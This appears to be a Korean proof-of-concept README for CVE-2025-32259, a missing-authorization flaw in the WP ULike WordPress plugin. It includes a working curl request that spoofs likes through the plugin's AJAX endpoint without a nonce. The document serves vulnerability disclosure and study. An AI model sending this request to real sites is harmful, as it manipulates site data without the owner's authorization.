
영향을 받는 WP ULike 플러그인 버전에서는 특정 AJAX 동작이나 투표 조작을 허용하기 전에 적절한 인가 확인이 수행되지 않습니다. 이로 인해 인증되지 않은 사용자가 로그인한 사용자만 수행할 수 있어야 하는 방식으로 플러그인과 상호작용할 수 있으며, 잠재적으로 투표를 왜곡하거나 오해를 불러일으키는 데이터를 주입할 수 있습니다.
🔬 WordPress용 WP ULike 플러그인의 CVE-2025-32259를 시연하는 간단한 PoC입니다.
🚨 교육 목적으로만 사용하세요 – 명시적 승인 없이 시스템을 테스트하지 마세요.
WP ULike는 사이트에서 사용자가 콘텐츠에 좋아요를 표시할 수 있게 해주는 인기 있는 WordPress 플러그인입니다. 4.7.9.1까지의 버전에는 인증 누락 취약점이 존재하며, 인증되지 않은 사용자가 AJAX 요청을 통해 "좋아요" 작업을 스푸핑할 수 있습니다.
이 취약점으로 인해 인증되지 않은 사용자가 AJAX 엔드포인트와 상호 작용하여 권한 없이 모든 콘텐츠(게시물, 댓글 등)에 좋아요를 표시할 수 있습니다.
curl -X POST https://target-site.com/wp-admin/admin-ajax.php \
-d "action=wp_ulike_process" \
-d "method=likeThis" \
-d "id=1" \
-d "type=post" \
-d "nonce=" \
-H "Content-Type: application/x-www-form-urlencoded"
id=1을 유효한 게시물 ID로 바꾸세요.
성공적인 응답은 다음과 비슷할 수 있습니다: {"status":"success","msg":"You liked this."}